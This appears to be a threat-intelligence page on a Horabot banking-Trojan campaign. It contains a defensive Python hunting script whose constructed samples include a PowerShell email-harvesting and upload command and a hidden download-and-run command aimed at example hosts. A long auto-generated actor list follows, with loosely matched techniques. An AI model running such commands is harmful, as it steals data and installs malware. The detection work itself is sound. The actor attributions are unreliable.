Trusted Design

How to uncover a Horabot campaign and detect this malware

Summary

This report details the discovery and analysis of a Horabot malware campaign targeting primarily Mexican users. The attack chain begins with a fake CAPTCHA page that leads through multiple stages of obfuscated scripts and ultimately delivers an AutoIt loader and a Delphi-based banking Trojan. The malware employs layered encryption, anti-VM checks, and a custom protocol for C2 communication. It also includes a spreader component written in PowerShell that harvests and exfiltrates email addresses, which are then used to distribute phishing emails. Comments in the code are written in Brazilian Portuguese, which points to the operators' likely origin. The report provides detection opportunities, including YARA rules and hunting queries, to identify this threat.
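The summary says the report ships YARA rules and hunting queries, but none of them are reproduced on this page. As an added illustration (not the report's own rules, and not code from the Horabot analysis), the following heuristic hunt looks through PowerShell script-block log entries (Windows PowerShell Operational log, Event ID 4104, field ScriptBlockText) for the spreader behaviour the summary describes: walk local files, pull out email addresses with a regex, and push the list out over HTTP or by sending mail. The signal patterns are assumptions about what such a script would contain, and the three log entries are constructed, so treat the thresholds as a starting point for tuning against your own script-block telemetry rather than as a finished detection.

```python
"""Heuristic hunt for a PowerShell email-harvesting / spreader pattern in
script-block log entries (Event ID 4104, ScriptBlockText). Illustration
added to this page; the signal patterns are assumptions, not indicators
from the report, and the sample log entries below are constructed."""
import re
from dataclasses import dataclass

# Each signal is one ingredient the summary attributes to the spreader.
# A benign admin script often shows one of them; the spreader needs the
# address extraction plus a way to move the list off the host.
SIGNALS = {
    # extracts addresses with a regex that contains an '@'
    "harvest": re.compile(
        r"(Select-String|\[regex\]|-match|Matches\()[^\n]{0,200}@", re.I),
    # walks user files or mail stores to find them
    "walk_files": re.compile(
        r"Get-ChildItem[^\n]{0,120}-Recurse|\.pst\b|\.ost\b|\.eml\b|\.msg\b", re.I),
    # talks HTTP: pushes the list to a collector or fetches the next stage
    "http_io": re.compile(
        r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadString|UploadData", re.I),
    # sends mail itself, i.e. the phishing distribution step
    "send_mail": re.compile(
        r"Send-MailMessage|System\.Net\.Mail|SmtpClient", re.I),
    # hides the run from the user
    "stealth": re.compile(
        r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|FromBase64String", re.I),
}


@dataclass
class Finding:
    record_id: int
    signals: list
    verdict: str


def classify(script_text: str) -> list:
    """Names of the signals present in one ScriptBlockText value, in SIGNALS order."""
    return [name for name, rx in SIGNALS.items() if rx.search(script_text)]


def verdict(signals) -> str:
    """Harvesting plus an outbound channel is the spreader combination;
    any other pair of signals is worth a look, a single one is not."""
    present = set(signals)
    if "harvest" in present and present & {"http_io", "send_mail"}:
        return "spreader-like"
    if len(present) >= 2:
        return "suspicious"
    return "benign"


def hunt(records) -> list:
    """records: iterable of dicts carrying RecordId and ScriptBlockText."""
    findings = []
    for r in records:
        sig = classify(r["ScriptBlockText"])
        findings.append(Finding(r["RecordId"], sig, verdict(sig)))
    return findings


# Constructed sample entries (not from the report). Entry 1 mimics the
# spreader: enumerate files, regex out addresses, upload the list.
SAMPLE_RECORDS = [
    {"RecordId": 1, "ScriptBlockText": r"""
$hits = Get-ChildItem $env:USERPROFILE -Recurse -Include *.txt,*.eml -ErrorAction SilentlyContinue |
    Select-String -Pattern '[\w.+-]+@[\w-]+\.[\w.]+' -AllMatches
$list = ($hits.Matches.Value | Sort-Object -Unique) -join ';'
(New-Object Net.WebClient).UploadString('http://collector.example/up', $list)
"""},
    # Entry 2: routine log housekeeping, recursive but nothing else.
    {"RecordId": 2, "ScriptBlockText": r"""
Get-ChildItem C:\Logs -Recurse -Filter *.log | Where-Object Length -gt 10MB | Remove-Item
"""},
    # Entry 3: hidden-window downloader, no harvesting.
    {"RecordId": 3, "ScriptBlockText": r"""
Invoke-WebRequest 'http://cdn.example/stage2.exe' -OutFile $env:TEMP\s2.exe
Start-Process $env:TEMP\s2.exe -WindowStyle Hidden
"""},
]


def hunt_sample() -> list:
    """Run the hunt over the constructed entries."""
    return hunt(SAMPLE_RECORDS)


if __name__ == "__main__":
    for f in hunt_sample():
        print(f"record {f.record_id}: {f.verdict:13} {', '.join(f.signals) or '-'}")
```

The verdict logic deliberately keys on the combination rather than on any single pattern: recursive file enumeration and HTTP calls are everyday administration, and an address regex on its own appears in plenty of parsing scripts, but a script that does both the extraction and the outbound step is the shape of the spreader the summary describes. Feed it exported 4104 events (the ScriptBlockText of each) rather than command lines, since the summary's multi-stage obfuscated scripts only show their real content once PowerShell has decoded them.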

Created: 2026-03-20

Indicators

Similar Pulses

No similar pulses were found.

Threat actors related to this pulse (fact-based)

HAFNIUM

Score: 21.97
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target

menuPass

Score: 8.38
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking

Wizard Spider

Score: 18.22
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1038 - DLL Search Order Hijacking
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1556.009 - Conditional Access Policies

APT33

Score: 8.01
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1562.012 - Disable or Modify Linux Audit System
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32

Fox Kitten

Score: 15.70
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking

CopyKittens

Score: 3.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1045 - Software Packing

Volt Typhoon

Score: 33.13
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1176 - Software Extensions
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1574.002 - DLL Side-Loading

APT1

Score: 5.50
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1136.002 - Domain Account

Mustang Panda

Score: 17.71
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1218.010 - Regsvr32

Play

Score: 16.85
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1574.009 - Path Interception by Unquoted Path

Chimera

Score: 8.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
  • T1059.003 - Windows Command Shell

Sea Turtle

Score: 22.12
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1499.003 - Application Exhaustion Flood
  • T1063 - Security Software Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API

APT39

Score: 11.52
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking

RedCurl

Score: 9.69
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling

APT5

Score: 12.56
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling

Agrius

Score: 11.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources

GALLIUM

Score: 12.13
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1157 - Dylib Hijacking

APT41

Score: 46.23
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1041 - Exfiltration Over C2 Channel
  • T1048 - Exfiltration Over Alternative Protocol
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1574.009 - Path Interception by Unquoted Path
  • T1564.003 - Hidden Window
  • T1574.002 - DLL Side-Loading

MuddyWater

Score: 24.47
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API

APT28

Score: 27.46
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1574.009 - Path Interception by Unquoted Path
  • T1197 - BITS Jobs
  • T1146 - Clear Command History

Turla

Score: 33.77
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1176 - Software Extensions
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1556.009 - Conditional Access Policies

Sowbug

Score: 4.10
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling

BRONZE BUTLER

Score: 6.18
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32

UNC3886

Score: 23.95
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1021.006 - Windows Remote Management
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32

Kimsuky

Score: 48.92
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1041 - Exfiltration Over C2 Channel
  • T1055.014 - VDSO Hijacking
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1197 - BITS Jobs

APT3

Score: 12.38
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32

FIN8

Score: 8.01
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Ke3chang

Score: 15.53
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking

Lotus Blossom

Score: 6.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1219.001 - IDE Tunneling
  • T1505 - Server Software Component

FIN13

Score: 21.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft

Earth Lusca

Score: 20.57
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1557.003 - DHCP Spoofing
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1218.001 - Compiled HTML File

Magic Hound

Score: 45.49
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1098.002 - Additional Email Delegate Permissions
  • T1547.008 - LSASS Driver

Aquatic Panda

Score: 7.05
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1120 - Peripheral Device Discovery
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources

INC Ransom

Score: 17.87
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1552.003 - Shell History
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Akira

Score: 14.22
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1137.005 - Outlook Rules
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

ToddyCat

Score: 9.23
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1547.008 - LSASS Driver

Contagious Interview

Score: 31.93
Matched TTPs:
  • T1044 - File System Permissions Weakness
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1547.005 - Security Support Provider
  • T1021.006 - Windows Remote Management
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1221 - Template Injection
  • T1547.008 - LSASS Driver

Andariel

Score: 7.80
Matched TTPs:
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32

Mustard Tempest

Score: 10.48
Matched TTPs:
  • T1682 - Query Public AI Services
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1557.003 - DHCP Spoofing

Daggerfly

Score: 3.80
Matched TTPs:
  • T1584.008 - Network Devices
  • T1120 - Peripheral Device Discovery

APT29

Score: 34.45
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1568 - Dynamic Resolution
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1157 - Dylib Hijacking
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.008 - LSASS Driver

Dragonfly

Score: 24.61
Matched TTPs:
  • T1584.008 - Network Devices
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1657 - Financial Theft
  • T1041 - Exfiltration Over C2 Channel
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32

Threat Group-3390

Score: 16.32
Matched TTPs:
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1574.009 - Path Interception by Unquoted Path

Ember Bear

Score: 18.23
Matched TTPs:
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1136.002 - Domain Account
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1519 - Emond

Axiom

Score: 18.42
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32

HEXANE

Score: 18.70
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1120 - Peripheral Device Discovery
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1134.002 - Create Process with Token
  • T1055.014 - VDSO Hijacking
  • T1097 - Pass the Ticket

Moonstone Sleet

Score: 16.59
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1134.002 - Create Process with Token
  • T1027 - Obfuscated Files or Information
  • T1197 - BITS Jobs
  • T1547.008 - LSASS Driver

Indrik Spider

Score: 7.66
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Lazarus Group

Score: 26.63
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1608.001 - Upload Malware
  • T1009 - Binary Padding
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1547.008 - LSASS Driver

OilRig

Score: 34.60
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1574.014 - AppDomainManager
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1048 - Exfiltration Over Alternative Protocol
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1556.009 - Conditional Access Policies
  • T1547.008 - LSASS Driver

LuminousMoth

Score: 14.58
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1584.005 - Botnet
  • T1574.009 - Path Interception by Unquoted Path

Sandworm Team

Score: 38.98
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1134.002 - Create Process with Token
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash

Salt Typhoon

Score: 10.44
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding

Aoqin Dragon

Score: 4.89
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32

Moses Staff

Score: 8.88
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers

TeamTNT

Score: 16.31
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1519 - Emond

FIN7

Score: 25.06
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1608.005 - Link Target
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Scattered Spider

Score: 48.84
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1583.001 - Domains
  • T1547.005 - Security Support Provider
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1197 - BITS Jobs
  • T1564.003 - Hidden Window
  • T1027.002 - Software Packing

Storm-0501

Score: 20.79
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1097 - Pass the Ticket
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code

FIN6

Score: 15.26
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1505 - Server Software Component
  • T1547.008 - LSASS Driver

BlackTech

Score: 4.41
Matched TTPs:
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.010 - Regsvr32

Confucius

Score: 8.59
Matched TTPs:
  • T1543.003 - Windows Service
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1218.010 - Regsvr32

Sidewinder

Score: 13.87
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1218.010 - Regsvr32

APT32

Score: 22.22
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32

Leviathan

Score: 17.81
Matched TTPs:
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1055.014 - VDSO Hijacking
  • T1157 - Dylib Hijacking
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32

ZIRCONIUM

Score: 12.62
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1608.005 - Link Target
  • T1197 - BITS Jobs

EXOTIC LILY

Score: 7.99
Matched TTPs:
  • T1543.003 - Windows Service
  • T1134.002 - Create Process with Token
  • T1218.010 - Regsvr32
  • T1547.008 - LSASS Driver

Molerats

Score: 3.50
Matched TTPs:
  • T1543.003 - Windows Service
  • T1562.012 - Disable or Modify Linux Audit System

Windshift

Score: 5.18
Matched TTPs:
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1547.008 - LSASS Driver

Cobalt Group

Score: 9.82
Matched TTPs:
  • T1543.003 - Windows Service
  • T1518.002 - Backup Software Discovery
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32

TA2541

Score: 11.26
Matched TTPs:
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources

Storm-1811

Score: 15.39
Matched TTPs:
  • T1543.003 - Windows Service
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact
  • T1567.003 - Exfiltration to Text Storage Sites
  • T1547.008 - LSASS Driver

Patchwork

Score: 9.96
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32

TA505

Score: 10.10
Matched TTPs:
  • T1543.003 - Windows Service
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

LazyScripter

Score: 8.26
Matched TTPs:
  • T1543.003 - Windows Service
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target

APT42

Score: 8.84
Matched TTPs:
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1583.001 - Domains
  • T1562.012 - Disable or Modify Linux Audit System

Silent Librarian

Score: 10.25
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1134.002 - Create Process with Token
  • T1584.005 - Botnet
  • T1157 - Dylib Hijacking

Star Blizzard

Score: 10.43
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1547.005 - Security Support Provider
  • T1657 - Financial Theft
  • T1157 - Dylib Hijacking

CURIUM

Score: 14.86
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1218.001 - Compiled HTML File
  • T1547.008 - LSASS Driver

Windigo

Score: 4.85
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling

BlackByte

Score: 16.48
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1134.001 - Token Impersonation/Theft
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Blue Mockingbird

Score: 11.61
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1027.014 - Polymorphic Code
  • T1505 - Server Software Component

Darkhotel

Score: 4.00
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32

Rocke

Score: 13.87
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1036.009 - Break Process Trees
